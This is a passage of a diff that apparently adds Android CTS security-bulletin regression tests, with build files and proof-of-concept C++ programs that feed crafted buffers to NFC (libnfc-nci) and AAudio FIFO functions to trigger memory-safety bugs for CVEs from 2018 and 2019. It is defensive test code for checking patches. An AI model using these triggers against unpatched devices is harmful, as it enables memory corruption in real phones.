+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
new file mode 100644
index 0000000..6c4ccf2
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include "llcp_api.h"
+
+#define DEFAULT_VALUE 0x06
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_connect(uint8_t* p_bytes, uint16_t length,
+ tLLCP_CONNECTION_PARAMS* p_params);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_connect(&p_bytes[offset], LENGTH, ¶ms);
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
new file mode 100644
index 0000000..f625438
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9563",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
new file mode 100644
index 0000000..e021114
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <llcp_api.h>
+
+#define DEFAULT_VALUE 0x02
+#define SIZE 16
+#define LENGTH 1
+
+extern tLLCP_STATUS llcp_util_parse_cc(uint8_t* p_bytes, uint16_t length,
+ uint16_t* p_miu, uint8_t* p_rw);
+
+int main() {
+ const int32_t offset = SIZE - LENGTH;
+ uint8_t* p_bytes = (uint8_t *)malloc(SIZE);
+ if (!p_bytes) {
+ return EXIT_FAILURE;
+ }
+ memset(p_bytes, DEFAULT_VALUE, SIZE);
+
+ tLLCP_CONNECTION_PARAMS params;
+ llcp_util_parse_cc(&p_bytes[offset], LENGTH, &(params.miu), &(params.rw));
+
+ free(p_bytes);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
new file mode 100644
index 0000000..0813445
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9584",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
new file mode 100644
index 0000000..94aa642
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/poc.cpp
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE *p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+
+ // Set evt_data.set_config.status
+ *p_msg = 0x03;
+ // Set evt_data.set_config.num_param_id
+ *(p_msg + 1) = 255;
+ nfc_ncif_set_config_status(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
new file mode 100644
index 0000000..8bbdd4f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2018-9585",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
new file mode 100644
index 0000000..7227adf
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9585/poc.cpp
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+#include <nfc_int.h>
+
+#define LENGTH 16
+
+char enable_selective_overload = ENABLE_NONE;
+extern tNFC_CB nfc_cb;
+
+static void resp_cback(tNFC_RESPONSE_EVT event, tNFC_RESPONSE* p_data) {
+ (void) event;
+ (void) p_data;
+}
+
+int main() {
+ nfc_cb.p_resp_cback = resp_cback;
+
+ enable_selective_overload = ENABLE_ALL;
+ uint8_t *p_msg = (uint8_t *)malloc(LENGTH);
+ if (!p_msg) {
+ return EXIT_FAILURE;
+ }
+ memset(p_msg, 0x01, LENGTH);
+
+ // Set evt_data.tlv_size
+ *(p_msg + 5) = 200;
+ nfc_ncif_proc_get_routing(p_msg, LENGTH);
+
+ free(p_msg);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
new file mode 100644
index 0000000..8315084
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/Android.bp
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2019-2007",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ shared_libs: [
+ "libaaudio_internal",
+ ],
+ include_dirs: [
+ "frameworks/av/media/libaaudio/src",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
new file mode 100644
index 0000000..7f8ebdb
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2007/poc.cpp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include "fifo/FifoBuffer.h"
+#include "fifo/FifoController.h"
+#include <stdlib.h>
+
+#define CAPACITY 83
+#define THRESHOLD 47
+#define NUM_FRAMES -9999999999
+
+using android::FifoController;
+
+int main() {
+ FifoController fifoController(CAPACITY, THRESHOLD);
+ fifoController.advanceReadIndex((android::fifo_frames_t)NUM_FRAMES);
+ fifoController.advanceWriteIndex((android::fifo_frames_t)NUM_FRAMES);
+ int32_t readIndex = fifoController.getReadIndex();
+ int32_t writeIndex = fifoController.getWriteIndex();
+
+ if ((readIndex < 0) || (writeIndex < 0)) {
+ return EXIT_VULNERABLE;
+ }
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
new file mode 100644
index 0000000..7ffdd65
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2013",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
new file mode 100644
index 0000000..23098ac
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2013/poc.cpp
@@ -0,0 +1,168 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <dlfcn.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#define T3T_MSG_FELICALITE_MC_OFFSET 0x01
+
+char enable_selective_overload = ENABLE_NONE;
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
+ uint8_t mrti_check, uint8_t mrti_update);
+
+static void (*real_GKI_freebuf)(void* ptr) = nullptr;
+void *kAllocatedPointers[2];
+int allocatedPointersIndex = -1;
+bool kIsInitialized = false;
+
+void init(void) {
+ real_GKI_freebuf = (void (*)(void*))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv");
+ if (!real_GKI_freebuf) {
+ return;
+ }
+
+ kIsInitialized = true;
+}
+
+void GKI_freebuf(void* ptr) {
+ if (!kIsInitialized) {
+ init();
+ }
+ if (ptr == kAllocatedPointers[0] || ptr == kAllocatedPointers[1]) {
+ return;
+ } else {
+ real_GKI_freebuf(ptr);
+ }
+}
+
+void *allocate_memory(size_t size) {
+ void *ptr = malloc(size);
+ memset(ptr, 0x0, size);
+ kAllocatedPointers[++allocatedPointersIndex] = ptr;
+ return ptr;
+}
+
+// borrowed from rw_i93.cc
+enum {
+ RW_T3T_CMD_DETECT_NDEF,
+ RW_T3T_CMD_CHECK_NDEF,
+ RW_T3T_CMD_UPDATE_NDEF,
+ RW_T3T_CMD_CHECK,
+ RW_T3T_CMD_UPDATE,
+ RW_T3T_CMD_SEND_RAW_FRAME,
+ RW_T3T_CMD_GET_SYSTEM_CODES,
+ RW_T3T_CMD_FORMAT,
+ RW_T3T_CMD_SET_READ_ONLY_SOFT,
+ RW_T3T_CMD_SET_READ_ONLY_HARD,
+
+ RW_T3T_CMD_MAX
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_T3T_STATE_NOT_ACTIVATED,
+ RW_T3T_STATE_IDLE,
+ RW_T3T_STATE_COMMAND_PENDING
+};
+
+// borrowed from rw_i93.cc
+enum {
+ /* Sub states for formatting Felica-Lite */
+ RW_T3T_FMT_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
+ formatting) */
+ RW_T3T_FMT_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-read to complete */
+ RW_T3T_FMT_SST_UPDATE_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-write to complete */
+ RW_T3T_FMT_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
+ to complete */
+
+ /* Sub states for setting Felica-Lite read only */
+ RW_T3T_SRO_SST_POLL_FELICA_LITE, /* Waiting for POLL Felica-Lite response (for
+ setting read only) */
+ RW_T3T_SRO_SST_UPDATE_NDEF_ATTRIB, /* Waiting for NDEF attribute block-write
+ to complete */
+ RW_T3T_SRO_SST_CHECK_MC_BLK, /* Waiting for Felica-Lite MC (MemoryControl)
+ block-read to complete */
+ RW_T3T_SRO_SST_UPDATE_MC_BLK /* Waiting for Felica-Lite MC (MemoryControl)
+ block-write to complete */
+};
+
+void cback(uint8_t c __attribute__((unused)),
+ tRW_DATA* d __attribute__((unused))) {
+}
+
+int main() {
+
+ enable_selective_overload = ENABLE_ALL;
+ tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
+ uint8_t mrti_check = 1, mrti_update = 1;
+ if (rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN *p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+ p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 4);
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+ p_data->status = NFC_STATUS_OK;
+
+ p_t3t->cur_cmd = RW_T3T_CMD_SET_READ_ONLY_HARD;
+ p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
+ p_t3t->rw_substate = RW_T3T_SRO_SST_CHECK_MC_BLK;
+
+ NFC_HDR* p_msg = (p_data->data).p_data;
+ p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;
+
+ uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
+ p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
+ p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;
+
+ uint8_t* p_mc = &p_t3t_rsp[T3T_MSG_RSP_OFFSET_CHECK_DATA];
+ p_mc[T3T_MSG_FELICALITE_MC_OFFSET_SYS_OP] = T3T_MSG_FELICALITE_MC_OFFSET;
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+ TIMER_LIST_ENT pFirst = { };
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ rw_cb.p_cback = &cback;
+ p_cb->p_cback(0, event, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp
new file mode 100644
index 0000000..b5a7b99
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2014",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/include",
+ "system/nfc/src/gki/common",
+ "system/nfc/src/nfc/include",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
new file mode 100644
index 0000000..26c607e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2014/poc.cpp
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <rw_int.h>
+#include <stdlib.h>
+
+#include "../includes/common.h"
+
+// borrowed from rw_t3t.cc
+#define RW_T3T_SENSF_RES_RD_OFFSET 17
+#define RW_T3T_SENSF_RES_RD_LEN 2
+#define DEFAULT_VALUE 0xBE
+
+extern tRW_CB rw_cb;
+void rw_init(void);
+void cback(uint8_t, tRW_DATA *) {}
+
+void GKI_start_timer(uint8_t, int32_t, bool) {}
+
+void GKI_stop_timer(uint8_t) {}
+
+int main() {
+ tRW_T3T_CB *p_cb = &rw_cb.tcb.t3t;
+
+ GKI_init();
+ rw_init();
+ rw_cb.p_cback = &cback;
+
+ for (int n = 0; n < NCI_NFCID2_LEN; ++n) {
+ p_cb->peer_nfcid2[n] = DEFAULT_VALUE;
+ }
+
+ p_cb->num_system_codes = T3T_MAX_SYSTEM_CODES;
+ p_cb->flags = RW_T3T_FL_W4_GET_SC_POLL_RSP;
+
+ uint8_t nci_status = NCI_STATUS_OK;
+ uint8_t num_responses = 1;
+ uint8_t sensf_res_buf_size =
+ RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN;
+ uint8_t *p_sensf_res_buf =
+ (uint8_t *)malloc(RW_T3T_SENSF_RES_RD_OFFSET + RW_T3T_SENSF_RES_RD_LEN);
+ rw_t3t_handle_nci_poll_ntf(nci_status, num_responses, sensf_res_buf_size,
+ p_sensf_res_buf);
+
+ free(p_sensf_res_buf);
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp
new file mode 100644
index 0000000..fe66191
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2019",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfc/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
new file mode 100644
index 0000000..483b7c4
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2019/poc.cpp
@@ -0,0 +1,65 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <ce_int.h>
+#include <nfc_int.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+#define OFFSET 8
+#define VULNERABLE_LENGTH 0
+
+char enable_selective_overload = ENABLE_NONE;
+
+extern tNFC_CB nfc_cb;
+extern tCE_CB ce_cb;
+
+void GKI_freebuf(void* p_buf __attribute__((unused))) {}
+
+void nfc_start_quick_timer(TIMER_LIST_ENT*, uint16_t, uint32_t) {}
+
+void nfc_stop_timer(TIMER_LIST_ENT*) {}
+
+void nfc_stop_quick_timer(TIMER_LIST_ENT*) {}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ GKI_init();
+ ce_init();
+ ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;
+
+ if (ce_select_t4t() != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(uint8_t) * 16);
+ NFC_HDR* p_c_apdu = (NFC_HDR*)p_data->data.p_data;
+ p_c_apdu->len = VULNERABLE_LENGTH;
+ p_c_apdu->offset = OFFSET;
+ uint8_t conn_id = 1;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);
+
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
new file mode 100644
index 0000000..bd2504e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2035/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2019-2035",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ ],
+ compile_multilib: "64",
